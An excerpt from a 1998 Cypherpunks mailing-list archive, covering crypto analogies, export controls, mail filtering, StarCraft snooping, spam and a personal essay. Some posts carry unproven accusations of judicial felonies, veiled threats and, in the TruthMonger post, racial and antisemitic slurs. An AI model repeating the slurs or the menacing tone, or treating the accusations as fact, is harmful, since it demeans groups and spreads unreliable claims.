Lawyers, we suspect that the possibility that Campos wrote the 56 page
document is remote.

Reason is that informants within the federal court system have told us
that
the government lawyers write the opinion and order, then gives them to
the 
judge to sign.

Morales and noticed in previous cases that material not presented to
judges were appearing in the judges' documents.

So when we study the document we will be looking for 

	1 material cited by Campos which Campos did not or should not
	have in his possession

	2  introduction of legal citations not presented to the court by either
	plaintiffs or defendant.

A judge is supposed to judge, not help either side.

	3 felony violations of the False Statement Act.

We learned from an Hispanic lawyer that government lawyers give false
citations
of case law to a judge to have the judge agree and dismiss the
plaintiff's case.
 
Morales and I still have been unable to obtain docket sheets from the
Tenth circuit for 
cases No. 94-2205, Payne v Sandia and 95-2204, Morales v Sandia.

We both won but crooked federal judges gave the win to Sandia.

Morales and my main purpose in filing the NSA genocide and deficient
crypto
algorithm lawsuit was to expose corruption in the US federal court
system.

A side purpose an international public service to expose technical
details of NSA's
bungled spy stingS so that congress can take some action to remedy
damage done
by US 'intelligence' agencies.

Albuquerque Journal 4/21/98 page A6 reports what happened.

  U.S. Aided Communist Foe Pol Pot
  Richard Reeves

  LOS ANGELES - ...

  Even after he fell from national power, we helped supply and protect
  Pol Pot because the Khmer Rouge was tying down large number of
occupying
  North Vietnamese troops.
    These are some of the names of the evil who were or still are paid
friends:
  o  Saddam Hussein, paid for making war on Iran.
  o  Gulbuddin Hekmatry, who made his name throwing acid in the faces of
female
     students in Kabul who dared to wear western dress, paid for making
was against
     communists in Afghanistan.
  o  The Taliban, the religious warriors we helped train to fight
communists who are 
     beating or killing those same women right now in Afghanistan.
  o  Manuel Noriega, the soldier-thug we encouraged to overthrow
elections in Panama
     because we did not like the results.
  o  Mobuto Sese Seko, one Joseph Mobutu, our man in Zaire.
  o  Jonas Savimbi, in constant war in Angola
  The list goes on.  It has for a long time and will, even if communism
is dead as a
  national security threat of the United States.  In may of these cases
our interest 
  involved resources - oil, usually, ...

Settlement should be made QUICKLY Before something possibly VERY
UNFORTUNATE happens.

Also, I needed legal delivery practice prior to filing a Privacy Act and
defamation
lawsuit.

Let's all hope for settlement.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 5 May 1998 07:21:27 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Re: Explaining crypto to people (was Re: A new Swiss banking novel)
Message-ID: <199805051426.KAA25168@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 May 1998 01:48:02 -0500 (CDT), Xcott Craver wrote:

> Now, I'm not saying analogies are evil, but the analogy
> to firearms is a *bad* one, and it stands to give people
> the misconception that crypto is many things that it is 
> not (not to mention including <stigma.h>).

I agree on you opinion of the use of analogies, at large.  
The stigma is real (as in "happening") but it is nevertheless a load of bull
since it is the result of the population misconceptions, of being brainwasher by the apostles of 
political correctness.  

The quintessential aspects of guns in a free society is that they are Liberty's teeths.
Crypto is also the same, only after the teeths have been bashed in...

I argued this over the Canadian Firearms Digest list.

Ciao

jfa

Jean-Francois Avon, Pierrefonds(Montreal) QC Canada
  JFA Technologies, R&D physicists & engineers
  Instrumentation & control, LabView programming.
PGP keys: http://w3.citenet.net/users/jf_avon
     and: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 5 May 1998 07:24:27 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Re: Explaining crypto to people (was Re: A new Swiss banking novel)
Message-ID: <199805051430.KAA25240@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



>> 	..As will the phrase, "cryptography is like a gun...."  Joe User
>> 	won't see authentication as "like a gun" any more than his telephone
>> 	is "like a gun."

It is part of the cultural folklore to believe that  "The pen is mightier than the sword" 

Ciao

jfa

Jean-Francois Avon, Pierrefonds(Montreal) QC Canada
  JFA Technologies, R&D physicists & engineers
  Instrumentation & control, LabView programming.
PGP keys: http://w3.citenet.net/users/jf_avon
     and: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 5 May 1998 08:49:18 -0700 (PDT)
To: ichudov@algebra.com (Igor Chudov @ home)
Subject: Re: Why are you bouncing my mail to Cypherpunks?
In-Reply-To: <199805050908.EAA02726@manifold.algebra.com>
Message-ID: <199805051548.LAA03287@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199805050908.EAA02726@manifold.algebra.com>, on 05/05/98 
   at 04:08 AM, ichudov@algebra.com (Igor Chudov @ home) said:

>The antispam assholes suddenly blocked domain ix.netcom.com.

>(an amazing thing to do, all in all, and shows how far away from reality
>can people be carried out by religion)

>It turned out that sendmail at our mail relay site was ckecking  their
>"blackhole DNS database".

>I deleted all the rules that refer to them and now things seem to be OK.

>I am sorry for your troubles, Bill.  Thanks for letting me know.

Well in all fairness I filter out netcom.com messages (I do have an
exception for Bill). With the exception of Bill's posts netcom is right up
there with aol, compuserve, and a few others where if it's not spam it's
some crap from the clue-impaired.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: "Do your parents *know* you are Ramones?" - Ms. Togar

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNU81wY9Co1n+aLhhAQEz9wP8CJhDiQ4wWkta6NrZbmZs35MkcLBJRo2j
yHBiuJ7lhkTPNRs7RXOJQvD1e789D9tr0vmoWijY1TgZ8PfvwOFpL4cvRc3y3zRB
v0I0RDg4KIy+KrTejzo6BDK6CrdxQkr/kPyOeQAs12p90c/Nj1kk7uMc+Z5AVZiz
sE7WVterZe0=
=OG6c
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listmaster@extensis.com
Date: Tue, 5 May 1998 12:25:05 -0700 (PDT)
To: undisclosed-recipients:;
Subject: Get Edgy with Extensis PhotoFrame
Message-ID: <bulk.7466.19980505105714@smeg.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


Introducing Extensis PhotoFrame for Adobe Photoshop Users 
http://products.extensis.com/PhotoFrame/

Remember when building a creative image edge was a headache?  
Those days are over.

Extensis has just released PhotoFrame 1.0, a versatile Photoshop 
plug-in that enables designers to develop customized, professional-
quality image frames and border effects for any image - right in 
Photoshop - in a fraction of the time it used to take.

Volumes 1 and 2 include a collection of hand painted and digitally 
created, professionally-designed borders. Start by viewing the 
keyword-searchable PhotoFrame collection from within the
image browser catalog. Once selected, simply drag the thumbnail 
into PhotoFrame and start using it! 

>From there, customize is the word. Simply and quickly adjust opacity, 
blur and color while the real-time preview shows the changes as you 
make them. You can rotate, flip, invert - or use a combination of up to 
3 separate frames to achieve the desired effect. 

With multiple redo/undo, you can go back and forth as much as 
needed before applying the final effect.  When finished, save your 
customized effect for future use.  

With the speed and versatility of Extensis PhotoFrame, you've got 
the Creative Edge.

-----------------------------------------
To order on-line visit: http://products.extensis.com/PhotoFrame/

To order by phone: 1-800-796-9798

Volume 1 (painted edge effects) or Volume 2 (digital edge effects) 
are available for $129.95 each.

For even greater savings, both volumes are available as a 
specially priced bundle for $199.95. Save $60.00!

PhotoFrame is compatible with both Mac and Windows.
-----------------------------------------

PS. We have made every effort to ensure this message is being 
sent only to people who have expressed interest in Extensis products. 
If we have sent this to you in error, please accept our apologies and 
reply with remove in the subject line for automatic exclusion from 
future communications.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Corvus Corvax" <corvuscorvax@hotmail.com>
Date: Tue, 5 May 1998 12:25:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: The Borg Arrive
Message-ID: <19980505192502.20297.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Cordian writes:

> Beware the Borg.  Coming soon to a neighborhood store near you.

I was recently asked to produce a drivers license in order to exchange a 
pair of long johns, paid for in cash. I asked why. "Store policy" was 
the reply. I asked why it was store policy, and the cashier responded 
with a hostile stare and exchanged the underwear for me.

Along the same lines, try refusing to give your zip code when asked at a 
register. Evidently some stores now simply cannot process a transaction 
without it. It's good for a laugh if you're bored. Borged?


571830573294323629934765012348436263285853260687657402192238

Corvus Corvax

324908584730535672342307543875016719214012473014020239437239


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@algebra.com>
Date: Tue, 5 May 1998 13:01:37 -0700 (PDT)
To: Sunder <sunder@brainlink.com>
Subject: First, they came for the morons... / Re: Blizzard Gets Sued For Snooping On Gamers
In-Reply-To: <354E42A8.6C422A1A@brainlink.com>
Message-ID: <354F70C6.4182@algebra.com>
MIME-Version: 1.0
Content-Type: text/plain


Sunder wrote: 
> ---------- Forwarded message ----------
> From: Salvatore Denaro <sal@panix.com>
> ---  Blizzard Gets Sued For Snooping On Gamers ---
>  Game developer Blizzard Entertainment is being sued for unlawful
> business practices, stemming from the revelation that the company's
> hot-selling new StarCraft snoops through players' hard drives and
> e-mails information to the company over the Internet.
> 
> http://www.techweb.com/news/story/TWB19980430S0015

But Blizzard defends the trap door, saying it was
meant to determine if certain players unable to log
onto the company's multiplayer gaming site,
Battle.Net, were using pirated software.

  And I've got a trap door into all Government computers to
determine if they have pirated copies of my letters to mom.
Nothing wrong with that, eh?

Besides Driscoll, most players interviewed by
TechWeb said they were not bothered by Blizzard's
actions. "The only people who were affected by this
were the morons who stole the game," said Jesse
Giles, in Houston. "As soon as you steal the game,
you're committing an illegal act."

  "First, they came for the morons who stole the game, and
I was a moron with a legal copy, so I didn't speak up..."

Nick Fox, of Waukesha, Wisc., agreed, saying credit
card companies hold large amounts of personal
information without legal liability. "I believe there are
more major invasions of privacy than them finding out
our real names, and everyone should chill," he said.

  And if Dad is already bungholing you,then it's no big deal
if Uncle Bob takes sloppy seconds, eh?

  Blizzard implies that they are only sticking it in 'a little
bit, but it seems to make sense that, once they have it in, they
might want to 'wiggle it around' a bit, to find out if the user
has pirated copies of their other software. And when they get
together for drinks with their buddies at other corporations,
I imagine they share information so they can keep track of who
the real whores are. Next thing you know, they're carpooling
to gangbang the users, to save on corporate gas.
  No doubt advancing technology will allow them to build a 'profile'
of software thieves, enabling them to kick in the doors of poor
niggers and cheap Jews and take them to special camps where they
can be 'reeducated'.
  And Nick and Jesse Moron will explain to us how only people who
fit the Piracy Profile have reason to worry, and that the SoftWare
internment camps are much nicer than the Credit internment camps.

  The 'upside' of Blizzard's snooping is that if the user has their
credit card information on the computer, then Blizzard can send and
charge them for future updates automatically, saving the user from
having to waste time deciding whether or not they want it.

  I'm beginning to think that AOL is the disease, and DC is only a
symptom.

TruthMongrel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 5 May 1998 15:40:31 -0700 (PDT)
To: whgiii@invweb.net (William H. Geiger III)
Subject: Re: Why are you bouncing my mail to Cypherpunks?
In-Reply-To: <199805051548.LAA03287@users.invweb.net>
Message-ID: <199805052238.RAA08070@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


William H. Geiger III wrote:
>    at 04:08 AM, ichudov@algebra.com (Igor Chudov @ home) said:
> >The antispam assholes suddenly blocked domain ix.netcom.com.
> 
> >(an amazing thing to do, all in all, and shows how far away from reality
> >can people be carried out by religion)
> 
> >It turned out that sendmail at our mail relay site was ckecking  their
> >"blackhole DNS database".
> 
> >I deleted all the rules that refer to them and now things seem to be OK.
> 
> >I am sorry for your troubles, Bill.  Thanks for letting me know.
> 
> Well in all fairness I filter out netcom.com messages (I do have an
> exception for Bill). With the exception of Bill's posts netcom is right up
> there with aol, compuserve, and a few others where if it's not spam it's
> some crap from the clue-impaired.

_You_ can do it. _Cypherpuks@algebra.com_ cannot do it.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Tue, 5 May 1998 16:28:53 -0700 (PDT)
To: mgraffam@mhv.net
Subject: Re: Explaining crypto to people (was Re: A new Swiss banking novel)
In-Reply-To: <Pine.LNX.3.96.980505025206.25569A-100000@localhost>
Message-ID: <Pine.SUN.3.91.980505180604.23912A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 May 1998 mgraffam@mhv.net wrote:

> Having said that, I don't really think it is necessary to go around
> saying "Crypto is like a bomb" either. Crypto _can_ be used as a defensive
> or an offensive weapon, however the same technology can be used for
> authentication and digital cash and loads of other neat stuff. I'll
> preach about all of them, especially those that I personally have an
> interest in.. authentication, digital cash and secure email. 

	Which is my point.  Crypto can be seen as a weapon, just like 
	it can be seen as a very strong safe.  The public doesn't have
	a very strong conception of what this crypto stuff _is_, and
	so they're going to suck a lot more than you intended out of 
	whatever analogy you pick.  If you say "bomb," they'll think
	"bomb."  And this generates misconceptions.

> Certain analogies are useful in certain instances. When useful to
> make the analogy to firearms, it _can_ be an excellent one.. so can
> a lock. 
> 
> Last time I checked though, padlocks aren't a hot topic for debate as
> to their being banned. Crypto, in certain aspects, is.

	Again, my point.  Padlocks and safes are *not* under the gun,
	so to speak.  People will not see crypto regulation as silly
	if they keep getting fed bomb and gun analogies.  They'd think
	it was damned silly if they got padlock and safe analogies.
	Remember, many people are still fuzzy about just what this stuff 
	is that the govt. is trying to regulate.  

	I mean, when's the last time you saw someone defending their
	choice of buying a padlock?  Or saying that, "look, a padlock
	_can_ be used by criminals, but I'm a responsible adult."
	Nobody thinks of evil terrorists when they see a padlock on
	the store shelf, and that's the way it should be with crypto.

> > 	It is chillingly naive to defend an argument on the grounds
> > 	that when dissected logically it is a true statement.  
> 
> Are you suggesting that I should defend and argument, when looked at
> logically is false?

	Not at all.  Nobody's suggesting that anyone lie.  Rather:
	
> One can take many true statements and present them in a way to
> make things seem to be what they are not.

	...and one can do this by accident as well.  I believe that
	telling people crypto is "like a gun" is exactly this.  And
	this is why I feel the firearm analogies should be dropped
	when explaining crypto to people.  

> > 	Dropping a flawed analogy isn't covering the truth.  Rather,
> > 	keeping the analogy distorts the truth.
> 
> See, I don't think that the analogy to weaponry is all that far off.
> The exact same software that could let me sign my documents or
> order neat stuff over the web can use the exact same algorithms
> for transmitting designs for bombs.

	Then envelopes are weapons.  Stamps are weapons.  Fax
	machines are weapons.

	Now, I know, you're thinking, "yes, technically, they are."
	But remember, again, that we're talking about explaining
	the concept of crypto to people who are pretty much new
	to it.  They have no idea how literal your analogy is.
	The phrase, "the pen is mightier than the sword"
	would have a wholly different effect on people if they
	had no idea what a "pen" was.

  .,-:::::   :::.         ....:::::: @niu.edu -- http://www.math.niu.edu/~caj/
,;;;'````'   ;;`;;     ;;;;;;;;;````
[[[         ,[[ '[[,   ''`  `[[.     "I'd like a large order of FiboNachos."
$$$        c$$$cc$$$c ,,,    `$$      "Okay sir, that'll cost as much as a
`88bo,__,o, 888   888,888boood88    small order and a medium order combined."
  "YUMMMMMP"YMM   ""` "MMMMMMMM"  _____________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 5 May 1998 20:59:49 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Re: Explaining crypto to people (was Re: A new Swiss banking novel)
Message-ID: <199805060405.AAA10956@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 May 1998 18:28:46 -0500 (CDT), Xcott Craver wrote:

>Again, my point.  Padlocks and safes are *not* under the gun,
>	so to speak.  People will not see crypto regulation as silly
>	if they keep getting fed bomb and gun analogies.  They'd think
>	it was damned silly if they got padlock and safe analogies.

The analogy of crypto =  padlock lack something.

A padlock can *always* pried open.  A court order can always be issued to open it.
So Joe Enforcment will be on it's way with it's crowbars, liquid N2, saws and/or torches and do his 
duty.  It will be no loss of time to him.

Strong encryption is different.  No matter what Joe Enforcment try, the crypto lock won't give away 
(well, at least, this is what we assume here).  Working on it means just one thing: absolute waste 
of ressources.

AFA Joe Enforcement is concerned, a gun has some of the same potentiality: try to force it and 
you also risk an absolute waste of ressources.  From a human standpoint, it might look different, 
but if you make abstraction of human life (like most dictators do), some of the effects are similar.

Ciao

jfa




Jean-Francois Avon, Pierrefonds (Montreal), Canada
Unregistered Firearms in the hands of honest citizens: Liberty's Teeth
Strong Cryptographic tools in the hands of honest citizens: Liberty's Voice
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anonymous@netassist.se>
Date: Tue, 5 May 1998 22:45:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: New restrictions on distributing the SFL
Message-ID: <4c7c7aa1394e1e7a898bb6d6b0097a0a@kapten.zoom.nu>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Tue, 05 May 1998 17:24:25 -0700
>To: imc-sfl@imc.org
>From: Paul Hoffman / IMC <phoffman@imc.org>
>Subject: New restrictions on distributing the SFL

I'm sorry to announce that the source code for the SFL has been removed
from the official site. It has been moved to a new site,
<http://www.armadillo.huntsville.al.us/software/smime/> that appears to be
export-controlled. You need a password to get the software from that site,
and the passwords are handed out by the US Department of Defense.

I'm personally embarssed that the government of my country enforces such
silly laws. I understand that many other countries have similar laws, but
that doesn't make me feel any better. I had hoped that the SFL would be the
beginning of sensibility on the part of the US government with respect to
cryptography distribution; I still have that hope for the future.

There are many people on this mailing list who are outside the US, and this
change in distribution may prevent you from getting the SFL. If other Web
sites appear that contain unofficial versions of the SFL and do not
restrict who can download from them, I will be happy to list those on the
IMC SFL page at <http://www.imc.org/imc-sfl/>. I would also like to list
links to cryptography packages that work with the SFL at our site.

--Paul Hoffman, Director
--Internet Mail Consortium







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 6 May 1998 07:07:09 -0700 (PDT)
To: j orlin grabbe <kalliste@aci.net>
Subject: simplicity & found docket sheet
Message-ID: <35506D8B.6428@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Wednesday 5/6/98 7:29 AM

J Orlin Grabbe

Your new single-column format, I feel, has advantages over
the old three-column format. http://www.aci.net/kalliste/

1  Not as much scrolling as was required to read the three-column
   format.

2  When I copies material out of columns 2 or 3 to save in a file
   [orlin.txt, of course], I had to use the Auto-format in Word
   to collapse the leading blanks.

I am studying, by thinking, about how John Young has organized his
information and the simplicity of what Young has done.
http://www.jya.com/index.htm

Simplicity exudes brilliance.  And also, I am guessing, is key
to outstanding architectural designs.

I have some ideas about a 80c32, MASM, and Visual Basic Internet
forum I am mulling-over in my mind.  I am completing an 80c32
project.  

Then I need to revise my book.


http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

Publicity of this mess on Internet has helped book sales.

Today I am working on 

1  COMES NOW plaintiffs Payne and Morales [Plaintiffs] to exercise their

rights under the Federal Rules of Civil Procedure, Rule 52. Findings by
the 

Court; Judgment on Partial Findings

  (b) Amendment. On a party's motion filed no later than 10 days after 
  entry of judgment, the court may amend its findings--or make
additional 
  findings--and may amend the judgment accordingly. The motion may 
  accompany a motion for a new trial under Rule 59. When findings of
fact 
  are made in actions tried without a jury, the sufficiency of the 
  evidence supporting the findings may be later questioned whether or
not 
  in the district court the party raising the question objected to the 
  findings, moved to amend them, or moved for partial findings.

And I see  this morning at 

http://www.jya.com/whp-10usca.htm

that John Young found the docket sheet on my case on Internet which
Tenth
Circuit court clerks Fisher and Hoecker refused to send me.

USCA: Payne v. Sandia National Lab Docket         May 5, 1998

I think I see WRITTEN EVIDENCE, now published on Internet, that court
clerks and 
federal judges have committed Title 18 felony violations of law.

Morales and I are not above filing criminal complaint affidavits when we
possess
WRITTEN EVIDENCE of guilt.

We all must remember the sage words of defendant Harvey Brewster,

	If it is not written-down, then it didn't happen.

Sandia/EEOC, fortunately for me, left a WRITTEN TRAIL of evidence of
wrongdoing.

This mess should be settled 

   http://www.jya.com/whp043098.htm

so that we can all move on to more constructive projects.  

Before it gets WORSE.  Perhaps megatons worse?

Allahu akbar
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruises that won't heal" <lordsmen@iquest.net>
Date: Wed, 6 May 1998 11:26:48 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: My Philosophy on Life (Please direct all feedback to my email, not to the group)
Message-ID: <199805061826.LAA08914@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


NOTE:  This is probably one of the most unstructured and free-flowing
papers that I have
ever written.  Take it with a grain of salt and two advils.

In the world we live today, it is safest to be either at the top or insane.
 In a story I read last semester out of my ultra-thick Literature textbook,
this was first introduced to me.  One of the leading characters, an
educated man, felt the "sorrow of sanity."  It's true that in this world,
we all want meaningful lives.  Not only do we want to be successful, but we
need to be happy.  The real question of life lies in what brings us
happiness.  So, as you read this, keep the goal of happiness in mind.

First of all, I'd like to talk about my influences throughout my life. 
Television was a large part of my life in the early years, which I am sad
to say has shaped a very minute amount of my mind.  The television, or our
"Vast Wasteland," is a horrible medium  that has too much to say about so
much.  In my eyes, television has failed to serve the "public's interest,
convenience, and necessity."  It has too much of a handle on the world
today, and people blindly accept most/all of what they see.  You may tell
yourself that you are not one of those who conform to the views of the
television, but even witty shows such as South Park and insanely stupid
shows like Beavis and Butthead shaped our lives.  We used to laugh when
Butthead would slap Beavis, and we'd get excited when Beavis would yell 
"Fire!  Fire!"  A statement which was later proven to be a cause for a
young child to light a fatal fire in his own house.  As we grow older, our
minds begin to become more autonomous and move away from such ignorance and
mindless influence, but the way that we are brought up as children will
always be a big influence on our lives.  And since those funny Roadrunner
and Coyote cartoons were there and influenced us as children, a very small
part carries over.  A happy childhood or a sad childhood shapes what we can
become as adolescent youth.  Most of us undergo something sad and traumatic
as children.  Mine came around the age of 14 when my sister and father use
to argue constantly.  Hatred affects us, even when it isn't directly
between us and someone else.  Anyway, this traumatic experience, which also
lasts longer with some, is a major cause for our disbelief and our lack of
immediate trust in everything.  It causes us to think twice about
everything, and it causes us to worry.  We are burned by everybody
throughout our lives.  Remember the first time that our parents tricked us
into something and how angry we were because we were misled?  Remember when
you came home to find your pet, who was one of your best friends, gone
forever and never to be seen again?  Maybe you came home to find that a
really close relative of yours died and somehow you felt betrayed by either
God, or the doctors, or somehow you felt responsible.  Maybe you still
blame yourself for your parent's divorce.  Either way, these are the major
climaxes of our childhood which also carry over.  You see  the jerks out in
the world, and you see those who easily betray, and sometimes you wonder
who first betrayed them, or who manipulated their minds to be so
uncompassionate.  It's sad that everyone has to learn these things at a
young age where we are all so susceptible to misbeliefs and conjectures of
the corporate world.  But, unfortunately, we learn by mistake and that is
human nature. 

This leads me into the thoughts of how human nature can kill a spirit.  We
all like to be liked, and we all need to be loved by somebody.  A heavy
heart appears where love is less spent.  And the nature of hate (which I
believe is not human nature but more a learned emotion) can kill a spirit. 
And the feeling of being disliked, betrayed, hell, even when we hate
someone, that all can kill us.  But this doesn't prove how human nature can
kill a spirit.  I can say this is done because of the way that we naturally
react to so many things.  For example, we learn to hate because we are
first hated or betrayed.   People can be so cold to us, and we take all
that as a part of us (of course, as children) and we turn it into rage and
hate.  When a child is molested by an adult, he/she can instantly reject
the members of his/her offending sex.  They can even lose trust in their
parents (especially if the parent is the offender).  It's a very sad thing
that this is, and it damages so deeply in the soul and heart.  What I'd
like to discuss now is the cause that many people indulge in.

Alcoholism is a terrible disease.  I don't say that because I think that
drinking is wrong.  I believe that irresponsible drinking is wrong.  It's
true that alcoholics don't begin as heavy drinkers, but I believe that
alcoholics form because of drinking due to depression.  Those kids who are
neglected and don't have so many great friends as children may seek refuge
in being drunk or high.  The position I take on marijuana versus. alcohol
is this.  I don't consider anything I can grow in my backyard a drug.  And
marijuana isn't nearly addictive as alcohol because you can only become
psychologically addicted.   We've all experienced mental addictions (seeing
the Titanic movie twenty some times would probably constitute.)  Sex is
more addictive than marijuana is (in my opinion.)  Anyway, alcohol is like
anything else in the ways that it can be used responsibly but is unlike
anything else because it can cause people to rape, kill, and do things a
sane person would never dream of.  So, people, I urge you to drink
responsibly.  Don't drink out of ruins of depression, because it will not
delay problems or solve them.  That is the problem with the world today. 
We don't solve problems.  We just fix them.  Anyway, as Michael Stipe says
in Everybody Hurts "Don't throw your hands/hang on/take comfort in your
friends." 

My second major concern is pornography.  This is some major bull shit. 
It's corporate people who, as the government  allows them to, take
advantage of people's human urges to cheat on their wives or whatnot. 
Sure, you may believe that I am taking things way to far.  It's only a
naked chick on a page.  But when you find someone special and you want to
have sex with her, she's only the next step up from a bottle of lotion and
a couple of magazines.  Porn-freaks begin to see women as objects, argue
with spouses and dates for insignificant reasons.  Nothing good comes from
pornography of any type.  I guess it's semi-reasonable if a couple want to
use videos together and so, but leave this exploitation alone and I don't
think you'll regret it.  Realize that so much of the downfall of America is
just an expense to the success of someone else's success. 

Now, my personal feelings on how America works.  Government is corrupt. 
It's goal is to serve the people with their own interests.  This is a
farce.  First of all, America is not a democracy.  In a true democracy,
each person voices their opinion on every subject.  Since we have such a
huge number of people living in our country, this is impossible.  So we
elect representatives who we think will best serve in the government
according to our own interests.  But this rarely happens.  Sure, those
stupid bills that would never get passed (i.e.. drop the gun carrying age
to 14) never do pass.  Those are common sense actions.  But real
controversial issues (abortion, education, health care, death penalty,
etc.) are very hard to set actions on because it affects so many people and
the politicians have so many decisions to make.  But I cannot say that our
government is a failure.  They would protect me if Cuba shot missiles at my
home state tonight, and they'll give glue my arm back on if it happens to
fall off on the way to school tomorrow and I had no way to pay for it.  So,
we can all argue about what the government is doing, but we must all also
be thankful that our government isn't shooting us as we walk down the
street.  Anyway, the government isn't the problem so much in America today.
 It's the marketplace.  Commercial business has made more laws than the
government, and it's the big corporate giants who will decide what is the
next biggest fashion. 

Corporate America is the root of all the trouble I can see in America. 
Let's go back to my examples above about the stupid junk with pornos and
drugs and such.  Pornography, I will restate, is worthless and damaging to
the United States.  Now, let's all ask ourselves where this garbage is
piped in from.  Corporate America.  How could it be, you ask?  Simply put,
most of the people in the United States of America (which never really seem
united) will only do things if it makes them money and or it makes them
happy.  Now, most of the time, we won't even do things if it makes us
happy.  We'd all be happy to turn the channel when Barney the Money-Hungry
Education Dinosaur comes on, but if the remote is on top of the television,
we might just take a few minutes for the show to really get on our nerves
before  we'll get up to change it.  That 15 second walk can kill you,
especially if Corporate America has had you up since 5 in the morning. 
But, hold on, the kids want to watch Barney.  Darn it!  You've been slaving
all day at work to raise enough money for those kids to wear expensive
clothes and to buy $30 Barney videos, and now they want to pry into your
time alone?  No, you yell at the kids to go watch another television or to
go outside so you can have some peace and quiet.  Geez, what's daddy so
angry about?  Could it be that he's overworked and stressed, and that he
never spends time with us because all of his spare time is wrapped up in
getting rest for work the next day?  Oh, it's no big worry, because daddy
has all day Saturday off to wash the car, plant some flowers, pay the
bills, cook dinner for us, call back all those people who have called
during the week and to go shopping... all the things he enjoys the most. 
Maybe this summer, daddy can take a week or two to take us to Dinghy world
and spend so much money on us!  Then he can come back and work for two
months to pay off those pesky credit card companies for the thousands of
dollars he spent.  And while daddy is at work, those nice guys on
television can tell us about all the neat things to buy.  Yes, daddy will
love the looks on our faces when we open up our happy meals (what ever
happened to those cool boxes?) and we get our My Little Pony dolls.  But we
can't have just one pony!  We need the whole set!  Let's get them all
daddy.

		A heart that's full up like a landfill.
		A job that slowly kills you.
		Bruises that won't heal.
		You look so tired and happy.
		Bring down the government.
		They don't speak for us.
		I'll take a quiet life.  A handshake.  Some carbon monoxide.
		No alarms and no surprises.
		No alarms and no surprises.  Please.
		Silent.  Silent.
		This is my final fit.
		My final bellyache.
		Such a pretty house.
		Such a pretty garden.

"Are they getting on your nerves?"  I asked the lady who sat behind the
counter.  She opened up her purse and laid a twenty dollar bill on the
counter, got up and left.  The kids shot me with a water pistol and ran out
the door.  They piled into mommy's car as the lady broke down crying.  Her
rusted station wagon didn't have a back window, but it had a
semi-translucent tarp to keep out the wind and rain.  And then she dropped
her keys.  She wiped the tears from her eyes like lakes from the plains,
picked up her keys, and got in the car.  Never again will I see that woman,
but what she gave me, I wish I could return tenfold. 

 That really didn't happen to me, but it speaks words to me.  Some of you
may not understand that, but what it is basically is saying is that the guy
who spoke to the woman gained something inside from her pain.  She was
barren and empty, poor.  She gave him a 20 dollar thought, and he wished he
could give her 200 dollars.

It's all Corporate America's fault.  Here we could have a woman who went to
college, but couldn't accept a job because she couldn't afford to move.  So
she works days to pay for a tiny apartment, an expensive baby-sitter, and
for her three kids to live.  Where's the husband?  Dead maybe?  Maybe he
was an alcoholic and she kicked him out (not an uncommon thing).  Welcome
to Corporate America.  In their world, you don't have to bring anything to
survive, but they would like it better if you could leave some stuff
behind.  Otherwise, they'll take it away.  Let's talk about this. 
